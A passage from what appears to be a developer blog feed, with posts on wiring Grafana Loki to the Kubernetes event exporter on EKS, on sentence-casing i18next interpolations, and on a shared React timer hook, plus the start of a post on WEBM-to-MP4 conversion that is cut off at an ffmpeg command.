&quot;Sid&quot;: &quot;LokiStorage&quot;,            &quot;Effect&quot;: &quot;Allow&quot;,            &quot;Action&quot;: [                &quot;s3:ListBucket&quot;,                &quot;s3:PutObject&quot;,                &quot;s3:GetObject&quot;,                &quot;s3:DeleteObject&quot;            ],            &quot;Resource&quot;: [                &quot;arn:aws:s3:::grafana-loki-chunks-bucket&quot;,                &quot;arn:aws:s3:::grafana-loki-chunks-bucket/*&quot;,                &quot;arn:aws:s3:::grafana-loki-admin-bucket&quot;,                &quot;arn:aws:s3:::grafana-loki-admin-bucket/*&quot;,                &quot;arn:aws:s3:::grafana-loki-ruler-bucket&quot;,                &quot;arn:aws:s3:::grafana-loki-ruler-bucket/*&quot;            ]        }    ]}</code></pre><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/grafana-loki-policy.png" alt="grafana-loki-policy.png"></p><h3>3. Create a Role with the above permission</h3><p>Create a role with a custom trust policy &amp; use the below snippet</p><pre><code>{    &quot;Version&quot;: &quot;2012-10-17&quot;,    &quot;Statement&quot;: [        {            &quot;Effect&quot;: &quot;Allow&quot;,            &quot;Principal&quot;: {                &quot;Federated&quot;: &quot;arn:aws:iam::account_id:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/open_id&quot;            },            &quot;Action&quot;: &quot;sts:AssumeRoleWithWebIdentity&quot;,            &quot;Condition&quot;: {                &quot;StringEquals&quot;: {                    &quot;oidc.eks.us-east-1.amazonaws.com/id/open_id:aud&quot;: &quot;sts.amazonaws.com&quot;,                    &quot;oidc.eks.us-east-1.amazonaws.com/id/open_id:sub&quot;: &quot;system:serviceaccount:default:grafana-loki-access-s3-role-sa&quot;                }            }        }    ]}</code></pre><p>Note: Please update the account_id and open_id in the above given snippet.</p><p><strong>grafana-loki-access-s3-role-sa</strong>is the service account name that we willmention in the Loki values.</p><h3>4. Add Grafana using the helm chart</h3><p>To get this Helm chart, run this command:</p><pre><code class="language-jsx">helm repo add grafana https://grafana.github.io/helm-chartshelm repo update</code></pre><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/chart-add-output.png" alt="chart-add-output.png"></p><p>We have downloaded the latest version of the Grafana.</p><h3>5. Install grafana/loki stack using the helm chart</h3><p>Create a <strong>loki-values yaml</strong> file with the below snippet</p><pre><code>loki:  readinessProbe: {}  auth_enabled: false  storage:    bucketNames:      chunks: grafana-loki-chunks-bucket      ruler: grafana-loki-rules-bucket      admin: grafana-loki-admin-bucket    type: s3    s3:      endpoint: null      region: us-east-1      secretAccessKey: null      accessKeyId: null      s3ForcePathStyle: false      insecure: falsemonitoring:  lokiCanary:      enabled: false  selfMonitoring:    enabled: falsetest:  enabled: falseserviceAccount:  create: true  name: grafana-loki-access-s3-role-sa  imagePullSecrets: []  annotations:    eks.amazonaws.com/role-arn: arn:aws:iam::account_id:role/loki-role  automountServiceAccountToken: true</code></pre><p>To install Loki using the Helm Chart on Kubernetes Cluster, runthis<code>helm install</code>command:</p><pre><code class="language-jsx">helm install my-loki grafana/loki --values loki-values.yaml</code></pre><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/chart-installation-output.png" alt="chart-installation-output.png"></p><p>We have successfully installed Loki on the Kubernetes Cluster.</p><p>Run the followingcommand to view all the resources created by the Loki HelmChart in your Kubernetes cluster:</p><pre><code class="language-jsx">kubectl get all -l app.kubernetes.io/name=loki</code></pre><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/all-resources-output.png" alt="all-resources-output.png"></p><p>Helm chart created the following components:</p><ul><li><strong>Loki read and write:</strong> Loki is installed in scalable mode by default, whichincludes a read-and-write component. These components can be independentlyscaled out.</li><li><strong>Gateway:</strong> Inspired by Grafanas<a href="https://github.com/grafana/loki/blob/main/production/ksonnet/loki">Tanka setup</a>,the chart installs a gateway component by default. This NGINX componentexposes Lokis API and automatically proxies requests to the appropriate Lokicomponents (read or write, or a single instance in the case of filesystemstorage). The gateway must be enabled to provide an Ingress since the Ingressonly exposes the gateway. If enabled, Grafana and log shipping agents, such asPromtail, should be configured to use the gateway. If NetworkPolicies areenabled, they become more restrictive when the gateway is active.</li><li><strong>Caching:</strong> In-memory caching is enabled by default. If this type of cachingis unsuitable for your deployment, consider setting up memcache.</li></ul><p>Run this command to view all the Kubernetes Services for Prometheus &amp; Grafana:</p><pre><code class="language-jsx">kubectl get service -l app.kubernetes.io/name=loki</code></pre><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/all-services-output.png" alt="all-services-output.png"></p><p>Listed services for Loki are:</p><ul><li>loki-backend</li><li>loki-backend-headless</li><li>loki-gateway</li><li>loki-memberlist</li><li>loki-read</li><li>loki-read-headless</li><li>loki-write</li><li>loki-write-headless</li><li>query-scheduler-discovery</li></ul><p>The <code>loki-gateway</code> service will be used to add Loki as a Datasource intoGrafana.</p><h3>6. Adding Loki data source in Grafana</h3><p>On the main page of Grafana, click on &quot;<strong>Home</strong>&quot;. Under &quot;<strong>Connections</strong>&quot;, youwill find the &quot;<strong>Data sources</strong>&quot; option.</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/grafana-dashboard.png" alt="/blog_images/event-exporter-and-grafana-loki-integration/grafana-dashboard.png"></p><p>On the Data Sources page, click on the &quot;Add new data source&quot; button.</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/data-sources-page.png" alt="/blog_images/event-exporter-and-grafana-loki-integration/data-sources-page.png"></p><p>In the search bar, type &quot;Loki&quot; and search for it.</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/add-data-source.png" alt="/blog_images/event-exporter-and-grafana-loki-integration/add-data-source.png"></p><p>Clicking on &quot;Loki&quot; will redirect you to the dedicated page for the Loki datasource.</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/loki-data-source.png" alt="/blog_images/event-exporter-and-grafana-loki-integration/loki-data-source.png"></p><p>To read the metrics from Loki, we will use the <code>loki-gateway</code> service. Add theURL of the service as <code>http://loki-gateway</code>.</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/loki-form.png" alt="/blog_images/event-exporter-and-grafana-loki-integration/loki-form.png"></p><p>After clicking on the &quot;Save &amp; test&quot; button, you will receive a toastr messageshown in the image below. This message is received because no clients have beencreated for Loki yet.</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/loki-addon-output.png" alt="loki-addon-output.png"></p><h3>7. Install Kubernetes event exporter using the helm chart</h3><p>Create an <strong>event-exporter-values yaml</strong> file with the below snippet</p><pre><code class="language-jsx">config:  leaderElection: {}  logLevel: debug  logFormat: pretty  metricsNamePrefix: event_exporter_  receivers:    - name: &quot;dump&quot;      file:        path: &quot;/dev/stdout&quot;        layout: {}    - name: &quot;loki&quot;      loki:        url: &quot;http://loki-gateway/loki/api/v1/push&quot;        streamLabels:          source: kubernetes-event-exporter          container: kubernetes-event-exporter  route:    routes:      - match:          - receiver: &quot;dump&quot;          - receiver: &quot;loki&quot;</code></pre><p>With the use of the above snippet, run this command to install the Kubernetesevent exporter in your Kubernetes Cluster.</p><pre><code class="language-jsx">helm repo add bitnami [https://charts.bitnami.com/bitnami](https://charts.bitnami.com/bitnami)helm install event-exporter bitnami/kubernetes-event-exporter --values event-exporter.yaml</code></pre><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/event-exporter-installation-output.png" alt="event-exporter-installation-output.png"></p><p>To view all the resources created by the above helm chart, run this command:</p><pre><code class="language-jsx">kubectl get all -l app.kubernetes.io/name=kubernetes-event-exporter</code></pre><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/event-exporter-all-resources.png" alt="event-exporter-all-resources.png"></p><p>To view the logs of the event exporter POD, run this command:</p><pre><code class="language-jsx">kubectl logs -f pod/kubernetes-event-exporter-586455bbdd-sqlqc</code></pre><p>Note: Replace <strong>kubernetes-event-exporter-586455bbdd-sqlqc</strong> with your pod name.</p><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/event-exporter-logs.png" alt="event-exporter-logs"></p><p>As you can see in the above image, the event exporter is working and runningfine. Event logs are being sent to both the receivers that wed configure in thevalues YAML file.</p><p>Once the POD is created &amp; running, we can go back to the Loki data source under<strong>Connections</strong> &gt; <strong>Data Sources</strong> page.</p><p>Again click on the Save &amp; test button &amp; this time youll receive a successtoastr message.</p><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/loki-data-source-added-output.png" alt="loki-data-source-added-output"></p><h3>8. Kubernetes event exporter dashboard</h3><p>We will import this<a href="https://grafana.com/grafana/dashboards/17882-kubernetes-event-exporter/">dashboard</a>into Grafana to monitor and track the events received from the Kubernetescluster. You can go through this blog if you want to learn how to import anexisting dashboard into Grafana.</p><p>After successfully importing the dashboard, you can view all the events from thecluster, as shown in the image below. Additionally, you can filter the eventsbased on any value within any interval.</p><p>Kubernetes Event Exporter</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/event-exporter-dashboard.png" alt="Kubernetes Event Exporter"></p><h2>Conclusion</h2><p>In this blog post, we discussed the process of setting up Grafana Loki andKubernetes Event exporter. We covered various steps, such as creating a policyfor Grafana Loki, creating a role with the necessary permissions, and addingGrafana using the Helm chart, installing the Loki stack, and adding Loki as adata source in Grafana, installing Kubernetes event exporter using the Helmchart, and finally, setting up the Kubernetes event exporter dashboard inGrafana.</p><p>By following the steps outlined in this blog post, you can effectively monitorand track events from your Kubernetes cluster using Grafana Loki and KubernetesEvent exporter. This setup provides valuable insights and helps introubleshooting and analyzing events in your cluster.</p><p>If you have any questions or feedback, please feel free to reach out. Happymonitoring!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Automatically sentence-case i18next translations]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/lowercase-translations"/>
      <updated>2024-04-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/lowercase-translations</id>
      <content type="html"><![CDATA[<p>We use <a href="https://www.i18next.com/">i18next</a> to handle our localizationrequirements. We have written in great detail how we use<a href="https://www.bigbinary.com/blog/react-localization">i18next and react-i18next libraries</a>in our applications.</p><p>As our translations grew, we realized that instead of adding every combination of thetexts as separate entries in the translation file, we can reuse most of them byutilizing the i18next interpolation feature.</p><p><a href="https://www.i18next.com/translation-function/interpolation">Interpolation</a> isone of the most used functionalities in i18n. It allows integrating dynamicvalues into our translations.</p><pre><code class="language-json">{  &quot;key&quot;: &quot;{{what}} is {{how}}&quot;}</code></pre><pre><code class="language-js">i18next.t(&quot;key&quot;, { what: &quot;i18next&quot;, how: &quot;great&quot; });// -&gt; &quot;i18next is great&quot;</code></pre><h3>Problem</h3><p>As we started to use interpolation more and more, we started seeing a lot of textwith irregular casing. For instance, in one of our apps, we have an <code>Add</code> buttonin a few pages.</p><pre><code class="language-json">{  &quot;addMember&quot;: &quot;Add a member&quot;,  &quot;addWebsite&quot;: &quot;Add a website&quot;}</code></pre><p>Instead of adding each text as an entry in the translation file as shown above,we took a bit of a generic approach and started using interpolation. Now ourtranslation files started to look like this.</p><pre><code class="language-json">{  &quot;add&quot;: &quot;Add a {{entity}}&quot;,  &quot;entities&quot;: {    &quot;member&quot;: &quot;Member&quot;,    &quot;website&quot;: &quot;Website&quot;  }}</code></pre><p>This is great, but it has a slight problem. The final text looked likethis.</p><pre><code class="language-plaintext">Add a Member</code></pre><p>We can see the <code>Member</code> is still capitalized, we needed it to be properlysentence-cased like this.</p><pre><code class="language-plaintext">Add a member</code></pre><p>We first thought we would just add <code>.toLocaleLowerCase()</code> to the dynamic value.</p><pre><code class="language-js">t(&quot;add&quot;, { entity: t(&quot;entities.member&quot;).toLocaleLowerCase() });</code></pre><p>It worked fine. But often, developers would forget to add <code>.toLocaleLowerCase()</code>in a lot of places. Secondly, it started to pollute our code with too much<code>.toLocaleLowerCase()</code>.</p><p>As always, we decided to extract this problem to our<a href="https://www.bigbinary.com/blog/neeto-commons-frontend">neeto-commons-frontend</a>package.</p><h3>Solutions we looked at</h3><p>At first, it seemed like a very simple problem. We thought we can just use the<a href="https://www.i18next.com/misc/creating-own-plugins#post-processor">post-processor</a>feature. We just need to sentence-case the entire text on <code>post-process</code> likethis.</p><pre><code class="language-js">const sentenceCaseProcessor = {  type: &quot;postProcessor&quot;,  name: &quot;sentenceCaseProcessor&quot;,  process: text =&gt; {    // Sentence-case text.    return (      text.charAt(0).toLocaleUpperCase() + text.slice(1).toLocaleLowerCase()    );  },};i18next  .use(LanguageDetector)  .use(initReactI18next)  .use(sentenceCaseProcessor)  .init({    resources: resources,    fallbackLng: &quot;en&quot;,    interpolation: {      escapeValue: false,      skipOnVariables: false,    },    postProcess: [sentenceCaseProcessor.name],  });</code></pre><p>Voila! Now onwards, all the texts will be properly sentence-cased, we no longerneed to add <code>.toLocaleLowerCase()</code>. Great? Not really.</p><p>We soon realized that not every text should be sentence-cased, there are a lotof cases where we need to preserve the original casing. Here are some examples.</p><pre><code class="language-plaintext">Your file is larger than 2MB.Disconnect Google integration?No results found with your search query &quot;Oliver&quot;.Your Api Key: AJg3c4TcXXXXXXXXXNo internet, NeetoForm is offline.</code></pre><p>These examples clearly show why it's not a simple problem. We require a moretargeted and nuanced solution. Upon revisiting the issue, we found that ourinitial solution of adding <code>.toLocaleLowerCase()</code> does work, but it's a bitverbose.</p><p>So we decided to try<a href="https://www.i18next.com/translation-function/formatting#adding-custom-format-function">custom formatters</a>.So instead of adding <code>.toLocaleLowerCase()</code>, we created a nice custom formattercalled <code>lowercase</code>.</p><pre><code class="language-js">i18next.services.formatter.add(&quot;lowercase&quot;, (value, lng, options) =&gt; {  return value.toLocaleLowerCase();});</code></pre><pre><code class="language-json">{  &quot;add&quot;: &quot;Add a {{entity, lowercase}}&quot;,  &quot;entities&quot;: {    &quot;member&quot;: &quot;Member&quot;,    &quot;website&quot;: &quot;Website&quot;  }}</code></pre><p>This works perfectly, but it doesn't solve the verbosity problem. Instead ofadding <code>.toLocaleLowerCase()</code> in JavaScript files, we're now adding it intranslation JSON files - essentially just moving the problem to a differentplace.</p><p>We needed a better solution that required minimal effort.</p><p>The idea here is to lowercase all dynamic values by default and create aformatter to handle exceptions. To achieve this, we combined our previouspost-processor and a new formatter. The new formatter, which we called <code>anyCase</code>can be used to flag any dynamic part in the text that needs to be excluded fromlowercasing. The post-processor will ignore these particular parts of the textwhile sentence-casing.</p><pre><code class="language-js">const ANY_CASE_STR = &quot;__ANY_CASE__&quot;;i18next.services.formatter.add(&quot;anyCase&quot;, (value, lng, options) =&gt; {  return ANY_CASE_STR + value + ANY_CASE_STR;});</code></pre><pre><code class="language-json">{  &quot;message&quot;: &quot;Your file is larger than {{size, anyCase}}&quot;}</code></pre><p>The post-processor we wrote attempted to identify these parts of the text markedby <code>anyCase</code> formatter using pattern matching and retaining the original casing.However, this approach failed when the text contained identical words in boththe dynamic and static parts of the text. It ended up lowercasing both words,which is not the output we needed.</p><h3>Final solution</h3><p>Before we discuss the final solution, i18next recently changed how a formatteris added, which is what we have been using so far, like below.</p><pre><code class="language-js">i18next.services.formatter.add(&quot;underscore&quot;, (value, lng, options) =&gt; {  return value.replace(/\s+/g, &quot;_&quot;);});</code></pre><p>Before this, i18next had a different syntax, which they now call legacy formattingis like below.</p><pre><code class="language-js">i18next.use(initReactI18next).init({  resources: resources,  fallbackLng: &quot;en&quot;,  interpolation: {    format: (value, format, lng, options) =&gt; {      // All our formatters should go here.    },  },});</code></pre><p>Now back to our original problem.</p><p>We need to make sure that when applying formatting, it only formats dynamic parts. Forthis, we found that if we use the legacy version of formatting, it offers anoption called <code>alwaysFormat: true</code>. One thing to remember here is if we chooseto use this flag, the latest style of formatting does not work. That means weneed to move all our custom formatters to the legacy format function.</p><pre><code class="language-js">i18next.use(initReactI18next).init({  resources: resources,  fallbackLng: &quot;en&quot;,  interpolation: {    escapeValue: false,    skipOnVariables: false,    alwaysFormat: true,    format: (value, format, lng, options) =&gt; {      // All your formatters should go here.    },  },});</code></pre><p>This is not a problem for us, because we are already maintaining all our customformatter in one place(<code>neeto-commons-frontend</code> package). Now the formatter isapplied to every dynamic text. This approach also overcame the &quot;identical wordsin the text problem&quot; that we encountered with the previous version of theformatter. Let's look at our updated formatter.</p><pre><code class="language-js">const LOWERCASED = &quot;__LOWERCASED__&quot;;const lowerCaseFormatter = (value, format) =&gt; {  if (!value || format === ANY_CASE || typeof value !== &quot;string&quot;) {    return value;  }  return LOWERCASED + value.toLocaleLowerCase();};</code></pre><p>To elaborate on the code, the formatter lowercases all dynamic texts andprefixes them with <code>__LOWERCASED__</code>. This prefixing is necessary because theformatter lacks information about where this specific piece of text originallyappeared in the complete text. By adding this prefix, if the lowercased texthappens to be the first part of the output, we can revert it during thepost-processing stage. And that's precisely what we accomplished in thepost-processor.</p><pre><code class="language-js">const sentenceCaseProcessor = {  type: &quot;postProcessor&quot;,  name: &quot;sentenceCaseProcessor&quot;,  process: value =&gt; {    const shouldSentenceCase = value.startsWith(LOWERCASED); // Check if first word is lowercased.    value = value.replaceAll(LOWERCASED, &quot;&quot;); // Remove all __LOWERCASED__    return shouldSentenceCase ? sentenceCase(value) : value;  },};</code></pre><p>Below is everything put together, If you're interested in a working example ofthe same, checkout this<a href="https://gist.github.com/neerajsingh0101/3c1413c28ec9115091b6644e3ceb9764">gist</a>.</p><pre><code class="language-js">const LOWERCASED = &quot;__LOWERCASED__&quot;;const ANY_CASE = &quot;anyCase&quot;;const sentenceCase = value =&gt;  value.charAt(0).toLocaleUpperCase() + value.slice(1);const lowerCaseFormatter = (value, format) =&gt; {  if (!value || format === ANY_CASE || typeof value !== &quot;string&quot;) {    return value;  }  return LOWERCASED + value.toLocaleLowerCase();};const sentenceCaseProcessor = {  type: &quot;postProcessor&quot;,  name: &quot;sentenceCaseProcessor&quot;,  process: value =&gt; {    const shouldSentenceCase = value.startsWith(LOWERCASED);    value = value.replaceAll(LOWERCASED, &quot;&quot;);    return shouldSentenceCase ? sentenceCase(value) : value;  },};i18next  .use(LanguageDetector)  .use(initReactI18next)  .use(sentenceCaseProcessor)  .init({    resources: resources,    fallbackLng: &quot;en&quot;,    interpolation: {      escapeValue: false,      skipOnVariables: false,      alwaysFormat: true,      format: (value, format, lng, options) =&gt; {        // other formatters        return lowerCaseFormatter(value, format);      },    },    postProcess: [sentenceCaseProcessor.name],    detection: {      order: [&quot;querystring&quot;, &quot;cookie&quot;, &quot;navigator&quot;, &quot;path&quot;],      caches: [&quot;cookie&quot;],      lookupQuerystring: &quot;lang&quot;,      lookupCookie: &quot;lang&quot;,    },  });</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Implementation of a universal timer]]></title>
       <author><name>Labeeb Latheef</name></author>
      <link href="https://www.bigbinary.com/blog/universal-timer"/>
      <updated>2024-03-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/universal-timer</id>
      <content type="html"><![CDATA[<p>When developing a web application, there could be numerous instances where wedeal with timers. The timer functions such as <code>setTimeout</code>, and <code>setInterval</code>are basic browser APIs that all web developers are well acquainted with. Whentrying to implement something like a self-advancing timer, these timer APIs makethe job easy.</p><p>Let's consider a simple use case. In React, if we are asked to implement acountdown timer that updates the time on the screen every second, we can use the<code>setInterval</code> method to get the job done.</p><pre><code class="language-jsx">const CountDownTimer = () =&gt; {  const [time, setTime] = useState(10);  useEffect(() =&gt; {    const interval = setInterval(() =&gt; {      setTime(time =&gt; {        if (time &gt; 0) return time - 1;        clearInterval(interval);        return time;      });    }, 1000); // Run this every 1 second.  }, []);  return &lt;p&gt;Remaining time: {time}&lt;/p&gt;;};</code></pre><p>This works great if we are only expecting to show a single timer on the page.What if we have to show multiple timers running on the same page?</p><h4>Multiple timers</h4><p>In the conversation page of our <a href="https://neetochat.com">NeetoChat</a> application,when listing each message in a conversation, we annotate each message with a&quot;time-ago&quot; label. This label indicates the duration since the message wasreceived and is expected to self-advance with passing time.</p><p><img src="/blog_images/2024/universal-timer/neeto-chat-timestamp-2.png" alt="NeetoChat timestamp"><img src="/blog_images/2024/universal-timer/neeto-chat-timestamp-1.png" alt="NeetoChat timestamp"></p><p>Normally, our first take on such implementation would be to use a <code>setInterval</code>timer inside the message component, which triggers the component to re-renderevery second to update the label. This becomes highly inefficient when we havehundreds of messages to be rendered on the screen at the same time.</p><p>The browser ends up running separate timers for each message to update theirlabel. Also, due to their asynchronous behavior, there is a higher chance thatthese timer events get stuck in the JS event loop and get fired at inappropriatemoments or get dropped altogether.</p><h4>Using a single timer</h4><p>An alternate approach could be to keep a single timer and a state on the messagelisting parent component. Then update the state on every passing second, andtrigger the entire list re-render. The obvious downside of this approach isrerendering a large conversation list and its children every single second. Thisis highly inappropriate and leads to unexpected stutter and other performanceissues.</p><p>What we wanted to achieve was to use a single timer that updates a single state,triggering the re-render of all the components that need to be updated. In caseof NeetoChat conversations, we needed to update &quot;time-ago&quot; labels alone, not theentire message component or any of its parent.</p><p>React's <a href="https://legacy.reactjs.org/docs/context.html">Context API</a> was the mostappropriate choice at the time for this task. The Context API offers a simpleway of sharing states or values across different components. Whenever the valueor the state changes, all its subscribed components are immediately notified ofthe change and trigger a re-render. To use this approach, first, we extractedthe timer and the state into a Context. Then, all the components that need to beupdated over time are subscribed to this context value. The timer updates thecontext value, and the subscribed components get rerendered.</p><pre><code class="language-jsx">import React, {  createContext,  useEffect,  useRef,  useMemo,  useCallback,} from &quot;react&quot;;const IntervalContext = createContext({});const defaultClockDelay = 10 * 1000; // 10 secondsexport const IntervalProvider = ({ children }) =&gt; {  const subscriptions = useRef(new Map()).current;  useEffect(() =&gt; {    const interval = setInterval(() =&gt; {      const now = Date.now();      for (const subscription of subscriptions.values()) {        // Check if delay is elapsed        if (now &lt; subscription.time) return;        subscription.callback(now);        // Set next callback time for the subscription.        subscription.time = now + subscription.delay;      }    }, defaultClockDelay);    return () =&gt; {      clearInterval(interval);    };  }, [subscriptions]);  const subscribe = useCallback(    (callback, delay = defaultClockDelay) =&gt; {      if (typeof callback !== &quot;function&quot;) return undefined;      const subscription = { callback, delay, time: Date.now() + delay };      subscriptions.set(subscription, subscription);      //unsubscribe callback      return () =&gt; subscriptions.delete(subscription);    },    [subscriptions]  );  const contextValue = useMemo(() =&gt; ({ subscribe }), [subscribe]);  return (    &lt;IntervalContext.Provider value={contextValue}&gt;      {children}    &lt;/IntervalContext.Provider&gt;  );};export default IntervalContext;</code></pre><p>The above context exposes a <code>subscribe</code> method that accepts a callback and adelay, which is added to the list of subscriptions. During each interval, we areiterating through the list of subscriptions and will invoke those callbacks forwhich the specified delay has elapsed.</p><p>To integrate this universal timer into the individual components easily, we havealso added a hook that wraps around the common subscription and cleanup logic.</p><pre><code class="language-javascript">import { useContext, useEffect, useState } from &quot;react&quot;;import IntervalContext from &quot;contexts/interval&quot;;const useInterval = delay =&gt; {  const [state, setState] = useState(Date.now());  const { subscribe } = useContext(IntervalContext);  useEffect(() =&gt; {    const unsubscribe = subscribe(now =&gt; setState(now), delay);    return unsubscribe;  }, [delay, subscribe]);  return state;};export default useInterval;</code></pre><p>Now, the component integration require only minimal configuration.</p><pre><code class="language-jsx">import { timeFormat } from &quot;neetocommons/utils&quot;;const TimeAgo = () =&gt; {  useInterval(10000); // Rerender every 10 seconds  // timeFormat.fromNow() returns the time  // difference between given time and now.  return &lt;p&gt;{timeFormat.fromNow(time)}&lt;/p&gt;;};</code></pre><p>This way, only the &quot;time-ago&quot; label components are updated every 10 secondswhile the parent message components remain unaffected by these updates.</p><h4>Using a global store</h4><p>As soon as that work was finished, our development guidelines were updated toreflect that we should use <a href="https://github.com/pmndrs/zustand">zustand</a> for allshared state usages. The above universal timer implementation was refactored touse a zustand store instead of React Context.</p><pre><code class="language-javascript">import { useEffect, useMemo } from &quot;react&quot;;import { isEmpty, omit, prop } from &quot;ramda&quot;;import { v4 as uuid } from &quot;uuid&quot;;import { create } from &quot;zustand&quot;;const useTimerStore = create(() =&gt; ({}));// Interval is created directly inside the module body,// outside the components and hooks.setInterval(() =&gt; {  const currentState = useTimerStore.getState();  const nextState = {};  const now = Date.now();  for (const key in currentState) {    const { lastUpdated, interval } = currentState[key];    // Check if delay is elapsed.    const shouldUpdate = now - lastUpdated &gt;= interval;    if (shouldUpdate) nextState[key] = { lastUpdated: now, interval };  }  if (!isEmpty(nextState)) useTimerStore.setState(nextState);}, 1000);// `useInterval` was changed to `useTimer`.const useTimer = (interval = 60) =&gt; {  const key = useMemo(uuid, []);  useEffect(() =&gt; {    useTimerStore.setState({      [key]: {        lastUpdated: Date.now(),        interval: 1000 * interval, // convert seconds to ms      },    });    return () =&gt;      useTimerStore.setState(omit([key], useTimerStore.getState()), true);  }, [interval, key]);  return useTimerStore(prop(key));};export default useTimer;</code></pre><p>zustand store allows access and updates to store values imperatively, outsidethe render by calling the <code>getState()</code> and <code>setState()</code> methods.</p><h4>An improved version</h4><p>In the latest iteration of the <code>useTimer</code> hook, we decided to cut down on theexternal dependency <code>zustand</code> and instead migrate the implementation to useReact's new<a href="https://react.dev/reference/react/useSyncExternalStore"><code>useSyncExternalStore</code></a>hook. The <code>useSyncExternalStore</code> hook basically allows you to derive a Reactstate from external change events.</p><pre><code class="language-javascript">import { useRef, useSyncExternalStore } from &quot;react&quot;;import { isNotEmpty } from &quot;neetocist&quot;;const subscriptions = [];let interval = null;const initiateInterval = () =&gt; {  // Create new interval if there are no existing subscriptions.  if (isNotEmpty(subscriptions)) return;  interval = setInterval(() =&gt; {    subscriptions.forEach(callback =&gt; callback());  }, 1000);};const cleanupInterval = () =&gt; {  // Cleanup existing interval if there are no more subscriptions  if (isNotEmpty(subscriptions)) return;  clearInterval(interval);};const subscribe = callback =&gt; {  initiateInterval();  subscriptions.push(callback);  // Runs on unmout. Remove subscription from the list.  return () =&gt; {    subscriptions.splice(subscriptions.indexOf(callback), 1);    cleanupInterval();  };};const useTimer = (delay = 60) =&gt; {  const lastUpdatedRef = useRef(Date.now());  return useSyncExternalStore(subscribe, () =&gt; {    const now = Date.now();    let lastUpdated = lastUpdatedRef.current;    // Calculate the time difference to derive new state    // If specified delay elapsed, return new value for the state. If not, return last value (no state change)    if (now - lastUpdated &gt;= delay * 1000) lastUpdated = now;    lastUpdatedRef.current = lastUpdated;    return lastUpdated;  });};</code></pre><p>In summary, when <code>useTimer</code> hook is invoked with a delay, the callback is addedto the list of subscriptions and executed when the specified delay has elapsed.On unmount, the subscription is removed from the list of subscriptions. Incontrast to previous versions, the new version is much cleaner and has the addedbenefit of running the interval timer only when required. The timer is addedonly when the first subscription is added and removed when all subscriptionshave been completed.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Universal playback and streaming support using MP4 and Range request headers]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/mp4_transmuxing_and_streaming_support-loom-alternative-part-3"/>
      <updated>2024-03-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/mp4_transmuxing_and_streaming_support-loom-alternative-part-3</id>
      <content type="html"><![CDATA[<p>This is part 3 of our blog on how we are building<a href="https://www.neeto.com/neetorecord">NeetoRecord</a>, a Loom alternative. Here are<a href="https://www.bigbinary.com/blog/build-web-based-screen-recorder-loom-alternative-part-1">part 1</a>and<a href="https://www.bigbinary.com/blog/persistant-storage-for-recordings-in-s3-loom-alternative-part-2">part 2</a>.</p><p>In Part 1 of our blog, we uploaded the recording from the browser to S3 insmall parts and stitched them together to get the final WEBM video file. Wecould use this WEBM file to share our recording with our audience, but it has afew drawbacks:</p><ol><li><p>WEBM is not universally supported. Though most modern browsers support WEBM,a few browsers, especially devices in the Apple ecosystem, do not play WEBMreliably.</p></li><li><p>Metadata for timestamps and duration are not present in WEBM videos. So,these videos are not &quot;seekable.&quot; It means these videos do not show the videolength, and we cannot move back and forth using the seek bar. The videostarts playing back from the beginning when the user tries to push the seekbar.</p></li></ol><p>Hence, we needed to convert the WEBM videos to a universally supported format tosolve the above problems. We chose MP4.</p><h2>MP4</h2><p>MP4 is a widely used multimedia file storage format for video storage andstreaming. It is an international standard that works with a vast range ofdevices. MP4 refers to the digital container file that acts as a wrapper aroundthe video, not the video itself. The video content within MP4 files is encodedwith MPEG-4, a common encoding standard.</p><p>We chose MP4 because:</p><ol><li>MP4 works with<a href="https://developer.mozilla.org/en-US/docs/Web/HTML/Element/video">HTML5 video player</a>.</li><li>Supports multiple streaming protocols.</li><li>Comprehensive support for user devices and browsers.</li></ol><h2>WEBM to MP4 conversion</h2><h3>AWS MediaConvert service</h3><p>Since our WEBM files were in an S3 bucket, our first idea was to use an AWSservice to do the WEBM to MP4 conversion. We configured<a href="https://aws.amazon.com/mediaconvert/">AWS Elemental MediaConvert service</a> andconnected it to our WEBM bucket. When a user uploads a WEBM file to the bucket,MediaConvert picks it up, converts it to MP4, and uploads it to a new bucket.</p><p>MediaConvert worked as expected, but we had to find another solution because:</p><ol><li>Cost - we found it too expensive for our use case.</li><li>Performance - It took a long time to do the conversion. While the smallerrecordings took about 20-30s, large ones took minutes. The time taken grewlinearly with the size of the WEBM file.</li></ol><h3>Manual transcoding using FFMPEG using AWS Lambda</h3><p>Converting WEBM to MP4 involves transcoding. Transcoding is the process ofchanging the audio/video codecs in a container file. Codecs are algorithms usedto encode and decode digital media data. Converting to MP4 would mean usingcodecs that are part of the MPEG-4 family. Eg: H.264 for video and AAC foraudio. <a href="https://ffmpeg.org">FFMPEG</a> is a popular open source tool that can beused for transcoding WEBM to MP4.</p><pre><code>ffmpeg -i input.webm -c:v libx264 -c:a aac  